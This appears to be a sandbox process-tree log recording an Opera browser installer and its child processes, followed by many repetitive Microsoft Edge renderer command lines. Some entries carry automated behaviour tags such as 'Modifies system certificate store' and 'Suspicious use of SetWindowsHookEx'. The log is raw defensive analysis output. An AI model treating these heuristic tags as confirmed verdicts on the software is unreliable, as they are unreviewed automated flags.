C:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exe --server-tracking-blob=YTgwNDlmMWIzMzdkZTU1OGVkZGM3YWNmNDU1NjYzNjQyNGViYmE5NzQ4MDhjZmRiMjQ1NTQ5YWU0OTVkMWFhMTp7ImNvdW50cnkiOiJHQiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL2ZyZWVyYW0teHAuZW4uc29mdG9uaWMuY29tLyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijoib3BlcmEiLCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPXNvZnRvbmljJnV0bV9jb250ZW50PU1ERl9QQiZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249Q1BJX1dJTiIsInRpbWVzdGFtcCI6IjE3MzMzMjEzNzcuNjEzNyIsInVzZXJhZ2VudCI6Ik1vemlsbGEvNS4wIChXaW5kb3dzIE5UIDEwLjA7IFdpbjY0OyB4NjQpIEFwcGxlV2ViS2l0LzUzNy4zNiAoS0hUTUwsIGxpa2UgR2Vja28pIENocm9tZS85Mi4wLjQ1MTUuMTMxIFNhZmFyaS81MzcuMzYgRWRnLzkyLjAuOTAyLjY3IiwidXRtIjp7ImNhbXBhaWduIjoiQ1BJX1dJTiIsImNvbnRlbnQiOiJNREZfUEIiLCJtZWRpdW0iOiJhcGIiLCJzb3VyY2UiOiJzb2Z0b25pYyJ9LCJ1dWlkIjoiMjQ0YmM4YTktZGMyOC00NDk5LWJjNjQtMWNmODE0OWM5NTAyIn0=3⤵
- Executes dropped EXE
- Enumerates connected drives
- System Location Discovery: System Language Discovery
- Modifies system certificate store
- Suspicious use of SetWindowsHookEx
PID:7948 -
C:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.68 --initial-client-data=0x32c,0x330,0x334,0x308,0x338,0x7282eae8,0x7282eaf4,0x7282eb004⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3552
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\setup.exe" --version4⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4744
-
-
C:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exe"C:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exe" --backend --install --import-browser-data=0 --enable-stats=1 --enable-installer-stats=1 --consent-given=1 --general-interests=1 --general-location=1 --personalized-content=1 --personalized-ads=1 --launchopera=1 --installfolder="C:\Users\Admin\AppData\Local\Programs\Opera" --profile-folder --language=en --singleprofile=0 --copyonly=0 --allusers=0 --setdefaultbrowser=1 --pintotaskbar=1 --pintostartmenu=1 --run-at-startup=1 --show-intro-overlay --server-tracking-data=server_tracking_data --initial-pid=7948 --package-dir-prefix="C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_20241204140946" --session-guid=218eadaa-3df3-4dd8-843c-55b1394eb084 --server-tracking-blob="YzEwYzUwZjEyMDkyYTliYmVmNGU1NTM4Y2YyZTk4YjEwZDViODViZGU5ODBmZmU4YjVjNDU1MGMyMzRkYWViZTp7ImNvdW50cnkiOiJHQiIsImh0dHBfcmVmZXJyZXIiOiJodHRwczovL2ZyZWVyYW0teHAuZW4uc29mdG9uaWMuY29tLyIsImluc3RhbGxlcl9uYW1lIjoiT3BlcmFTZXR1cC5leGUiLCJwcm9kdWN0Ijp7Im5hbWUiOiJvcGVyYSJ9LCJxdWVyeSI6Ii9vcGVyYS9zdGFibGUvd2luZG93cz91dG1fc291cmNlPXNvZnRvbmljJnV0bV9jb250ZW50PU1ERl9QQiZ1dG1fbWVkaXVtPWFwYiZ1dG1fY2FtcGFpZ249Q1BJX1dJTiIsInN5c3RlbSI6eyJwbGF0Zm9ybSI6eyJhcmNoIjoieDg2XzY0Iiwib3BzeXMiOiJXaW5kb3dzIiwib3BzeXMtdmVyc2lvbiI6IjEwIiwicGFja2FnZSI6IkVYRSJ9fSwidGltZXN0YW1wIjoiMTczMzMyMTM3Ny42MTM3IiwidXNlcmFnZW50IjoiTW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NCkgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgQ2hyb21lLzkyLjAuNDUxNS4xMzEgU2FmYXJpLzUzNy4zNiBFZGcvOTIuMC45MDIuNjciLCJ1dG0iOnsiY2FtcGFpZ24iOiJDUElfV0lOIiwiY29udGVudCI6Ik1ERl9QQiIsIm1lZGl1bSI6ImFwYiIsInNvdXJjZSI6InNvZnRvbmljIn0sInV1aWQiOiIyNDRiYzhhOS1kYzI4LTQ0OTktYmM2NC0xY2Y4MTQ5Yzk1MDIifQ== " --desktopshortcut=1 --wait-for-package --initial-proc-handle=90090000000000004⤵
- Enumerates connected drives
- System Location Discovery: System Language Discovery
PID:7960 -
C:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exeC:\Users\Admin\AppData\Local\Temp\7zS47FBBF0F\setup.exe --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=115.0.5322.68 --initial-client-data=0x31c,0x320,0x324,0x2f8,0x328,0x7192eae8,0x7192eaf4,0x7192eb005⤵
- System Location Discovery: System Language Discovery
PID:8336
-
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412041409461\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412041409461\assistant\Assistant_114.0.5282.21_Setup.exe_sfx.exe"4⤵
- System Location Discovery: System Language Discovery
PID:7432
-
-
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412041409461\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412041409461\assistant\assistant_installer.exe" --version4⤵
- System Location Discovery: System Language Discovery
PID:8072 -
C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412041409461\assistant\assistant_installer.exe"C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202412041409461\assistant\assistant_installer.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\Crash Reports" "--crash-count-file=C:\Users\Admin\AppData\Roaming\Opera Software\Opera Stable\crash_count.txt" --url=https://crashstats-collector-2.opera.com/ --annotation=channel=Stable --annotation=plat=Win32 --annotation=prod=OperaDesktop --annotation=ver=114.0.5282.21 --initial-client-data=0x220,0x224,0x228,0x1fc,0x22c,0x6317a0,0x6317ac,0x6317b85⤵
- System Location Discovery: System Language Discovery
PID:7616
-
-
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9228 /prefetch:12⤵PID:7100
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10652 /prefetch:12⤵PID:6592
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11340 /prefetch:12⤵PID:2632
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11924 /prefetch:12⤵PID:7640
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=140 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8116 /prefetch:12⤵PID:7328
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12068 /prefetch:12⤵PID:3140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9792 /prefetch:12⤵PID:9040
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7392 /prefetch:12⤵PID:6960
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=144 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7716 /prefetch:12⤵PID:8788
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=6536 /prefetch:82⤵PID:8420
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=146 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:12⤵PID:6512
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=147 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8472 /prefetch:12⤵PID:7312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=148 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7580 /prefetch:12⤵PID:7464
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=149 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10964 /prefetch:12⤵PID:8916
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=150 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5396 /prefetch:12⤵PID:8076
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=151 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:12⤵PID:8628
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6292 /prefetch:12⤵PID:5240
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9152 /prefetch:12⤵PID:8300
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=154 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9344 /prefetch:12⤵PID:8416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=155 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5544 /prefetch:12⤵PID:5016
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=156 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3420 /prefetch:12⤵PID:2220
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=158 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10652 /prefetch:12⤵PID:9140
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9016 /prefetch:82⤵PID:4704
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=160 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9236 /prefetch:12⤵PID:8556
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=161 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3428 /prefetch:12⤵PID:4584
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=162 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7796 /prefetch:12⤵PID:8604
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=163 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:12⤵PID:6896
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=164 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1964 /prefetch:12⤵PID:9104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=165 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11376 /prefetch:12⤵PID:7264
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=167 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11988 /prefetch:12⤵PID:4488
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=169 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=12096 /prefetch:12⤵PID:8068
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=7764 /prefetch:82⤵PID:4680
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=171 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6876 /prefetch:12⤵PID:2336
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=ppapi --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --device-scale-factor=1 --ppapi-antialiased-text-enabled=1 --ppapi-subpixel-rendering-setting=1 --mojo-platform-channel-handle=6760 /prefetch:62⤵PID:5104
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=173 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:12⤵PID:8536
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=174 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4280 /prefetch:12⤵PID:7292
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --extension-process --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=175 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8184 /prefetch:12⤵PID:3324
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=176 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8460 /prefetch:12⤵PID:9092
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=177 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7288 /prefetch:12⤵PID:9136
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=178 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9712 /prefetch:12⤵PID:2672
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=179 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8440 /prefetch:12⤵PID:6660
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=181 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5856 /prefetch:12⤵PID:6032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=182 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6924 /prefetch:12⤵PID:7072
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=183 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9428 /prefetch:12⤵PID:5188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=9008 /prefetch:82⤵PID:4548
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=185 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11460 /prefetch:12⤵PID:4692
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=186 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8752 /prefetch:12⤵PID:4784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=187 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7016 /prefetch:12⤵PID:2804
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=188 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9832 /prefetch:12⤵PID:5676
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2112,15755431271301971554,7568186467734207481,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=190 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5676 /prefetch:12⤵PID:3016
-
-
